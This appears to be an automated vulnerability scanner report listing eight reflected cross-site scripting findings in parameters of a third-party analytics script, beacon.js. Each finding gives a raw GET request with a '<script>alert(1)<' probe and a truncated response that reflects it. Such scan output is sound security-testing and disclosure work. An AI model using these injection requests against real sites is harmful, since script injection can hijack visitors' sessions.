1. Cross-site scripting (reflected)
1.1. http://b.scorecardresearch.com/beacon.js [c1 parameter]
1.2. http://b.scorecardresearch.com/beacon.js [c10 parameter]
1.3. http://b.scorecardresearch.com/beacon.js [c15 parameter]
1.4. http://b.scorecardresearch.com/beacon.js [c2 parameter]
1.5. http://b.scorecardresearch.com/beacon.js [c3 parameter]
1.6. http://b.scorecardresearch.com/beacon.js [c4 parameter]
1.7. http://b.scorecardresearch.com/beacon.js [c5 parameter]
1.8. http://b.scorecardresearch.com/beacon.js [c6 parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8546c6<script>alert(1)< Accept: */* Referer: http://www.technewsworld Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: UID=1cd27b1a-204.0.5.41 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 14 Nov 2010 22:24:55 GMT Date: Sun, 07 Nov 2010 22:24:55 GMT Connection: close Content-Length: 1446 if(typeof COMSCORE=="undefined") ...[SNIP]... MSCORE.purge=function(a) COMSCORE.beacon({c1:"8546c6<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Accept: */* Referer: http://www.technewsworld Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: UID=1cd27b1a-204.0.5.41 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 14 Nov 2010 22:25:07 GMT Date: Sun, 07 Nov 2010 22:25:07 GMT Connection: close Content-Length: 1446 if(typeof COMSCORE=="undefined") ...[SNIP]... mscore;for(b=a.length-1;b COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"7f049<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Accept: */* Referer: http://www.technewsworld Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: UID=1cd27b1a-204.0.5.41 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 14 Nov 2010 22:25:09 GMT Date: Sun, 07 Nov 2010 22:25:09 GMT Connection: close Content-Length: 1446 if(typeof COMSCORE=="undefined") ...[SNIP]... or(b=a.length-1;b>=0;b--) COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"5705a<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Accept: */* Referer: http://www.technewsworld Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: UID=1cd27b1a-204.0.5.41 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 14 Nov 2010 22:24:57 GMT Date: Sun, 07 Nov 2010 22:24:57 GMT Connection: close Content-Length: 1446 if(typeof COMSCORE=="undefined") ...[SNIP]... unction(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"6035308b87cf<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Accept: */* Referer: http://www.technewsworld Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: UID=1cd27b1a-204.0.5.41 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 14 Nov 2010 22:25:00 GMT Date: Sun, 07 Nov 2010 22:25:00 GMT Connection: close Content-Length: 1446 if(typeof COMSCORE=="undefined") ...[SNIP]... (a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"6035308", c3:"445ed<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Accept: */* Referer: http://www.technewsworld Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: UID=1cd27b1a-204.0.5.41 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 14 Nov 2010 22:25:01 GMT Date: Sun, 07 Nov 2010 22:25:01 GMT Connection: close Content-Length: 1446 if(typeof COMSCORE=="undefined") ...[SNIP]... {var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"c5f3f<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Accept: */* Referer: http://www.technewsworld Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: UID=1cd27b1a-204.0.5.41 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 14 Nov 2010 22:25:03 GMT Date: Sun, 07 Nov 2010 22:25:03 GMT Connection: close Content-Length: 1446 if(typeof COMSCORE=="undefined") ...[SNIP]... [],f,b;a=a||_comscore;for COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"bfe9f<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Accept: */* Referer: http://www.technewsworld Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: UID=1cd27b1a-204.0.5.41 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 14 Nov 2010 22:25:05 GMT Date: Sun, 07 Nov 2010 22:25:05 GMT Connection: close Content-Length: 1446 if(typeof COMSCORE=="undefined") ...[SNIP]... a=a||_comscore;for(b=a COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"83e12<script>alert(1)< |